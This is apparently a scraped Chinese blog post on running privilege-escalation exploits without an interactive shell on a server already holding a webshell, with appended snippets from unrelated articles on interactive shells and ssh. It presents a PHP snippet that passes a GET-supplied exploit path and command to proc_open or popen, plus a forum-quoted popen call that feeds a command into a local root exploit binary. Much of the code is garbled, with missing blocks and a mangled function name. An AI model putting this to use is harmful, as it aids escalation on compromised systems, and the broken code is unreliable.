前言
之前拿到某站的webshell之後,在提權的時候發現**不能**shell。而且,在滲透的時候經常遇到那種不能**shell的,你的提權工具拿上去之後因為沒有互動式的環境,也不知道提權是否成功。因此,寫了乙個簡單的工具。需要的朋友們可以參考學習www.cppcns.com。
方法如下
proce_open()
// path是提權工具的絕對路徑,例如:/usr/local/htdocs/2.6.18
// cmd是你需要執行的命令,例如:whoami
if(isset($_get['path']) && isset($_get['cmd']))
}**很簡單,不懂的可以看看php手冊,popen()在這裡也可以實現相同的效果
另外,有了這個**之後,我們以後提權是不是就可以直接把提權工具扔到伺服器上面,然後php**改一改,迴圈測試哪些提權工具是可用的了。
povwpjyuxpen()
這是土司之前乙個人發的,**原封不動的放在了下面。稍微改一改就能達到上面一樣的效果
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);
總結本文標題: linux下非互動式提權詳解
本文位址:
互動式 非互動式,登入式 非登入式Shell
互動式shell和非互動式shell 互動式模式 在終端上執行,shell等待你的輸入,並且立即執行你提交的命令。這種模式被稱作互動式是因為shell與使用者進行互動。這種模式也是大多數使用者非常熟悉的 登入 執行一些命令 退出。當你退出後,shell也終止了。非互動式模式 以shell scrip...
互動式 vs 非互動式 登入式 vs 非登入式
方式 區別區分方法 互動式與使用者互動 echo 返回值有i 非互動式 與script互動 echo 返回值沒有i 方式 登入區別 退出區別 區分方法 登入式需要username pwd logout exit echo 0 返回是 bash 非登入式 無需要username pwd exit ec...
ssh執行非互動式命令
如果你想用指令碼自動化登入到某台機子上,然後在上邊執行個命令,怎麼辦呢?可以使用ssh的非互動式命令 ssh zhc hongchangfirst.com home hczhang bin build.sh 這裡可以用expect模擬鍵盤輸入將密碼輸入,也可以用無密碼登入,具體就是將自己的公鑰放在對...